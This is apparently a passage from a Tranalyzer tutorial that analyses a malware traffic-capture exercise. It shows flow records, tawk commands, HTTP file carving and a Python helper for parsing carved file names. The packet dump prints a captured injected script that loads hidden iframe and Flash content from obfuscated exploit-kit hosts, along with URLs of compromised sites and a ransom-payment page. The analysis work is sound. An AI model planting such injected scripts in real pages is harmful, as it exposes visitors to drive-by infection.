A 25 0x0400000000004000 1431031908.780729000 1431031912.367847000 3.587118000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49202 72.34.49.86 us "IHNetworks" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "comarksecurity.com" "/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk" "application/x-www-form-urlencoded" "_wp-content_themes_grizzly_img5.php_u=mfymi71rapdzk_25_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 25 0x0400000000004001 1431031908.886579000 1431031912.367927000 3.481348000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 72.34.49.86 us "IHNetworks" 80 192.168.138.158 07 "Private network" 49202 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_grizzly_img5.php_u=mfymi71rapdzk_25_B_1_0" "Apache" "PHP/5.3.29"
A 26 0x0400000000004000 1431031914.993554000 1431031915.185509000 0.191955000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49203 204.152.254.221 us "Brinkster Communications Corpo" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "runlove.us" "/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9" "application/x-www-form-urlencoded" "_wp-content_themes_twentyfifteen_img5.php_f=ka6nnuvccqlw9_26_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 26 0x0400000000004001 1431031915.035444000 1431031915.185568000 0.150124000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 204.152.254.221 us "Brinkster Communications Corpo" 80 192.168.138.158 07 "Private network" 49203 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 404 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_twentyfifteen_img5.php_f=ka6nnuvccqlw9_26_B_1_0" "Apache"
A 33 0x0400000000004000 1431031945.999417000 1431032021.842696000 75.843279000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49209 95.163.121.204 ru "Digital Network JSC" 80 6 0x42 0x006c 0x0000 0x0a 0x0001 0x0010 1_1 0 2_0_0_0_0_1_0_1_2_1 0_0_0_0_0_1_0 "7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/flags/de.png";"/11iQmfg" "application/x-www-form-urlencoded" "PHPSESSID=uqq1670l1pkd07vgdnsg98dee5";"PHPSESSID=uqq1670l1pkd07vgdnsg98dee5" "_11iQmfg_33_A_2_0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" "http://7oqnsnzwwnm6zb7y.gigapaysun.com/11iQmfg"
B 33 0x0400000000004001 1431031946.199749000 1431031957.906658000 11.706909000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49209 6 0x02 0x0078 0x0000 0x00 0x0044 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_2 1_0_0_0_1_0_0 "image/png";"text/html" "_img_flags_de.png_33_B_1_0" "_11iQmfg_33_B_2_0" "nginx/1.2.1" "PHP/5.4.39-0+deb7u2"
B 30 0x0400000000004001 1431031944.192640000 1431031960.017404000 15.824764000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49206 6 0x02 0x0068 0x0000 0x00 0x0044 0x0010 0_0 2 200;304 0_0_0_1_0_0_0_0_0_2 2_0_0_0_1_0_0 "text/css";"image/png" "_img_flags_it.png_30_B_5_0";"_img_flags_fr.png_30_B_6_1" "_img_style.css_30_B_1_0" "nginx/1.2.1"
B 29 0x0400000000004001 1431031941.537441000 1431031962.048801000 20.511360000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49205 6 0x02 0x0068 0x0000 0x00 0x0044 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_2 3_0_0_0_1_0_0 "text/html";"image/png" "_img_flags_us.png_29_B_3_0";"_img_rt.png_29_B_4_1";"_img_bitcoin.png_29_B_5_2" "_11iQmfg_29_B_1_0" "nginx/1.2.1" "PHP/5.4.39-0+deb7u2"
B 34 0x0400000000004001 1431031946.186402000 1431031962.095257000 15.908855000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49210 6 0x02 0x0068 0x0000 0x00 0x0004 0x0010 0_0 1 200 0_0_0_1_0_0_0_0_0_1 3_0_0_0_0_0_0 "image/png" "_img_lt.png_34_B_1_0";"_img_lb.png_34_B_2_1";"_img_button_pay.png_34_B_3_2" "nginx/1.2.1"
Now you see all HTTP requests being exchanged, including content names and files. Yes, really fishy. If you want to see which host requests which file:
tawk -H '{ print $httpHosts, $httpURL }' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt | sort | tcol
"62.75.195.236" "/?34eaf8bd50d85d8c6baacb45f0a7b22e"
"62.75.195.236" "/?3a08b0be8322c244f5a1cb9c1057d941"
"62.75.195.236" "/?51424ddd486ff06861fceed24e86b329"
"62.75.195.236" "/?60dbe33b908e0086292196ef001816bc"
"62.75.195.236" "/aa25f5fe2875e3d0a244e6969e589cc4"
"62.75.195.236" "/?b2566564b3ba1a38e61c83957a7dbcd5"
"62.75.195.236" "/?b514ee6f0fe486009a6d83b035a4c0bd"
"62.75.195.236" "/?d71e0bd86db9587158745a986a4b3606"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/11iQmfg";"/img/flags/us.png";"/img/rt.png";"/img/bitcoin.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/flags/de.png";"/11iQmfg"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/flags/es.png";"/favicon.ico"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/lt.png";"/img/lb.png";"/img/button_pay.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/style.css";"/img/flags/it.png";"/img/flags/fr.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/picture.php?k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764";"/img/rb.png"
"comarksecurity.com" "/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg"
"comarksecurity.com" "/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42"
"comarksecurity.com" "/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9"
"comarksecurity.com" "/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk"
"ip-addr.es" "/"
"r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in" "/"
"runlove.us" "/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9"
"runlove.us" "/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42"
"runlove.us" "/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg"
"runlove.us" "/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk"
"ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in" "/"
"va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in" "/?285a4d4e4e5a4d4d4649584c5d43064b4745"
Look at the hosts and the URLs. That is malware.
The command and its output can be simplified further by using one of tawk's example functions, namely httpHostsURL():
tawk -e 'httpHostsURL()' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt
62.75.195.236
/?34eaf8bd50d85d8c6baacb45f0a7b22e
/?3a08b0be8322c244f5a1cb9c1057d941
/?51424ddd486ff06861fceed24e86b329
/?60dbe33b908e0086292196ef001816bc
/?b2566564b3ba1a38e61c83957a7dbcd5
/?b514ee6f0fe486009a6d83b035a4c0bd
/?d71e0bd86db9587158745a986a4b3606
/aa25f5fe2875e3d0a244e6969e589cc4
7oqnsnzwwnm6zb7y.gigapaysun.com
/11iQmfg
/favicon.ico
/img/bitcoin.png
/img/button_pay.png
/img/flags/de.png
/img/flags/es.png
/img/flags/fr.png
/img/flags/it.png
/img/flags/us.png
/img/lb.png
/img/lt.png
/img/rb.png
/img/rt.png
/img/style.css
/picture.php?k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764
comarksecurity.com
/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg
/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42
/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9
/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk
ip-addr.es
/
r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in
/
runlove.us
/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9
/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42
/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg
/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk
ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in
/
va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in
/?285a4d4e4e5a4d4d4649584c5d43064b4745
In the packet file you can see the full payload in its original form.
tcol ~/results/2015-05-08-traffic-analysis-exercise_packets.txt
%pktNo flowInd flowStat time pktIAT pktTrip flowDuration numHdrs hdrDesc vlanID srcMac dstMac ethType srcIP srcIPCC srcIPOrg srcPort dstIP dstIPCC dstIPOrg dstPort l4Proto tcpStatesAFlags httpStat httpAFlags httpMethods httpHeadMimes httpCFlags l7Content
1 1 0x0400000000004000 1431031896.723375000 0.000000000 0.000000000 0.000000000 3 eth:ipv4:udp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 60078 192.168.138.2 07 Private network 53 17 0x00 0x0000 0x0000 0x00 0x0000 0x0010 G............va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc\fe8mfzdgrf7g0\rgroupprograms.in.....
2 1 0x0400000000004001 1431031896.874326000 0.000000000 0.150951040 0.000000000 3 eth:ipv4:udp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.2 07 Private network 53 192.168.138.158 07 Private network 60078 17 0x00 0x0000 0x0000 0x00 0x0000 0x0010 G............va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc\fe8mfzdgrf7g0\rgroupprograms.in......\f..........>K..
3 2 0x0400000000004000 1431031896.958320000 0.000000000 0.000000000 0.000000000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 49184 62.75.195.236 il Not allocated by APNIC 80 6 0x00 0x0000 0x0000 0x00 0x0000 0x0010
4 2 0x0400000000004001 1431031897.090353000 0.000000000 0.132033024 0.000000000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il Not allocated by APNIC 80 192.168.138.158 07 Private network 49184 6 0x00 0x0000 0x0000 0x00 0x0000 0x0010
5 2 0x0400000000004000 1431031897.090448000 0.132128000 0.000095000 0.132128000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 49184 62.75.195.236 il Not allocated by APNIC 80 6 0x00 0x0000 0x0000 0x00 0x0000 0x0010
6 2 0x0400000000004000 1431031897.091322000 0.000874000 0.000969000 0.133002000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 49184 62.75.195.236 il Not allocated by APNIC 80 6 0x00 0x002c 0x0000 0x02 0x0000 0x0010 GET /?285a4d4e4e5a4d4d4649584c5d43064b4745 HTTP/1.1\r\nAccept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in\r\nConnection: Keep-Alive\r\n\r\n
7 2 0x0400000000004001 1431031897.091382000 0.001029000 0.000060000 0.001029000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il Not allocated by APNIC 80 192.168.138.158 07 Private network 49184 6 0x00 0x0000 0x0000 0x00 0x0000 0x0010
8 2 0x0400000000004001 1431031897.453906000 0.362524000 0.362584000 0.363553000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il Not allocated by APNIC 80 192.168.138.158 07 Private network 49184 6 0x00 0x0028 0x0000 0x00 0x0040 0x0010 HTTP/1.1 200 OK\r\nDate: Thu, 07 May 2015 20:51:34 GMT\r\nServer: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6\r\nX-Powered-By: PHP/5.3.3\r\nContent-Length: 560\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n<html><body><object type="application/x-shockwave-flash" allowScriptAccess="always" width="434" height="449"><param name="movie" value="http://ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in/"><param name="play" value="true"></object><script>var fhxa45 = document.createElement('if'+'rame');fhxa45.setAttribute('src', 'http://r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in/');fhxa45.setAttribute('width', 434);fhxa45.setAttribute('height', 449);document.body.appendChild(fhxa45);</script></body></html>
9 2 0x0400000000004000 1431031897.454085000 0.362763000 0.000179008 0.495765000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 49184 62.75.195.236 il Not allocated by APNIC 80 6 0x00 0x002c 0x0000 0x02 0x0000 0x0010
...
Data carving with httpSniffer
Now we want to extract the content. Set HTTP_SAVE_IMAGE, HTTP_SAVE_TEXT and HTTP_SAVE_APPL to 1 in httpSniffer.h, recompile httpSniffer and rerun t2.
t2conf httpSniffer -D HTTP_SAVE_IMAGE=1 -D HTTP_SAVE_TEXT=1 -D HTTP_SAVE_APPL=1 && t2build httpSniffer
t2 -r ~/data/2015-05-08-traffic-analysis-exercise.pcap -w ~/results
...
--------------------------------------------------------------------------------
tcpStates: Aggregated tcpStatesAFlags=0x42
httpSniffer: Aggregated httpStat=0xc53c
httpSniffer: Aggregated httpAFlags=0x1113
httpSniffer: Aggregated httpCFlags=0x0010
httpSniffer: Aggregated httpHeadMimes=0x0045
httpSniffer: Number of files img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0
httpSniffer: Max number of file handles: 7
httpSniffer: Number of HTTP packets: 399 [52.43%]
httpSniffer: Number of HTTP GET requests: 28 [7.02%]
httpSniffer: Number of HTTP POST requests: 9 [2.26%]
httpSniffer: HTTP GET/POST ratio: 3.11
--------------------------------------------------------------------------------
...
The 2nd line in the httpSniffer end report indicates that 7 files are extracted.
tawk -V httpStat=0xc53c -V httpAFlags=0x1113 -V httpCFlags=0x0010 -V httpHeadMimes=0x0045
The httpStat column with value 0xc53c is to be interpreted as follows:
    bit | httpStat | Description
    =============================================================================
      2 | 0x0004   | Internal state: pending URL name
      3 | 0x0008   | HTTP flow
      4 | 0x0010   | Internal state: Chunked transfer
      5 | 0x0020   | Internal state: HTTP flow detected
      8 | 0x0100   | Internal state: header shift
     10 | 0x0400   | Internal state: image payload sniffing
     14 | 0x4000   | Internal state: text payload sniffing
     15 | 0x8000   | Internal state: application payload sniffing

The httpAFlags column with value 0x1113 is to be interpreted as follows:
    bit | httpAFlags | Description
    =============================================================================
      0 | 0x0001     | POST query with parameters
      1 | 0x0002     | Host is IPv4, e.g., Host: 1.2.3.4
      4 | 0x0010     | Sequence number violation
      8 | 0x0100     | X-Site Scripting protection
     12 | 0x1000     | Possible EXE download

The httpCFlags column with value 0x0010 is to be interpreted as follows:
    bit | httpCFlags | Description
    =============================================================================
      4 | 0x0010     | Potential HTTP content

The httpHeadMimes column with value 0x0045 is to be interpreted as follows:
    bit | httpHeadMimes | Description
    =============================================================================
      0 | 0x0001        | Application
      2 | 0x0004        | Image
      6 | 0x0040        | Text
Now look into /tmp/:
ls /tmp
httpAppl httpPicture httpText ...
Look into /tmp/httpPicture:
ls /tmp/httpPicture
_favicon.ico_1_31_2_1 _img_button_pay.png_1_34_3_2 _img_flags_es.png_1_31_1_0 _img_flags_it.png_1_30_5_0 _img_lb.png_1_34_2_1 _img_rb.png_1_32_3_1 '_picture.php_k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764_1_32_1_0'
_img_bitcoin.png_1_29_5_2 _img_flags_de.png_1_33_1_0 _img_flags_fr.png_1_30_6_1 _img_flags_us.png_1_29_3_0 _img_lt.png_1_34_1_0 _img_rt.png_1_29_4_1
The files are directly linked to their flow through the encoding of the file name:
Filename_Flow-Dir(0/1)_findex_#Packet-in-Flow_#Mimetype-in-Flow
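As an added example (not part of this tutorial or of httpSniffer itself), the following Python parses carved file names according to this scheme and groups them by flow index and direction, so they can be joined against flowInd in the flow and packet files. The listing is constructed from the /tmp/httpPicture output above; the meaning of the direction field (1 = B flow, the reverse direction) is an assumption taken from the flowStat values in the packet file.

```python
# Added example, not part of the Tranalyzer tutorial or the httpSniffer source.
# httpSniffer names carved files as
#   Filename_Flow-Dir(0/1)_findex_#Packet-in-Flow_#Mimetype-in-Flow
# The URL-derived prefix may itself contain '_' (e.g. img/button_pay.png),
# so the four trailing fields are split off from the right. The prefix is kept
# verbatim: '_' stands for both '/' and a literal underscore, so the original
# URL cannot be reconstructed unambiguously; use findex to look it up instead.
from collections import defaultdict
from typing import NamedTuple

class CarvedFile(NamedTuple):
    name: str        # URL-derived prefix as written by httpSniffer
    direction: int   # 0 = A flow, 1 = B flow (lowest bit of flowStat; assumed)
    flow_index: int  # matches flowInd in the _flows.txt and _packets.txt files
    packet_no: int   # packet number within that flow
    mime_no: int     # n-th object of this MIME class within that flow

def parse_carved_name(filename: str) -> CarvedFile:
    """Split the trailing _dir_findex_pkt_mime fields off a carved file name."""
    parts = filename.rsplit("_", 4)
    if len(parts) != 5 or parts[1] not in ("0", "1"):
        raise ValueError(f"not a httpSniffer carved file name: {filename!r}")
    head, d, f, p, m = parts
    return CarvedFile(head, int(d), int(f), int(p), int(m))

def group_by_flow(filenames):
    """Map (flow_index, direction) -> [CarvedFile], for joining on flowInd."""
    groups = defaultdict(list)
    for fn in filenames:
        cf = parse_carved_name(fn)
        groups[(cf.flow_index, cf.direction)].append(cf)
    return dict(groups)

# Constructed sample: the /tmp/httpPicture listing from the tutorial.
SAMPLE_LISTING = [
    "_favicon.ico_1_31_2_1", "_img_button_pay.png_1_34_3_2",
    "_img_flags_es.png_1_31_1_0", "_img_flags_it.png_1_30_5_0",
    "_img_lb.png_1_34_2_1", "_img_rb.png_1_32_3_1",
    "_picture.php_k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764_1_32_1_0",
    "_img_bitcoin.png_1_29_5_2", "_img_flags_de.png_1_33_1_0",
    "_img_flags_fr.png_1_30_6_1", "_img_flags_us.png_1_29_3_0",
    "_img_lt.png_1_34_1_0", "_img_rt.png_1_29_4_1",
]

if __name__ == "__main__":
    for (findex, d), files in sorted(group_by_flow(SAMPLE_LISTING).items()):
        names = ", ".join(cf.name for cf in files)
        print(f"flowInd {findex} dir {d}: {names}")
```

Feeding the output of `ls /tmp/httpPicture` into group_by_flow tells you at a glance which flows delivered which objects, which is the join you need before looking a suspicious download up in the flow file.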
Open the pics with your file browser or with an image viewer (eog, feh, …), as you wish.
Be careful with the application folder (/tmp/httpAppl): it holds the extracted application payloads, and the end report flagged a possible EXE download (httpAFlags bit 12, 0x1000).
Conclusion
Don’t forget to reset the plugin configuration for the next tutorial.
t2conf httpSniffer --reset && t2build httpSniffer
Have fun analyzing HTTP traffic!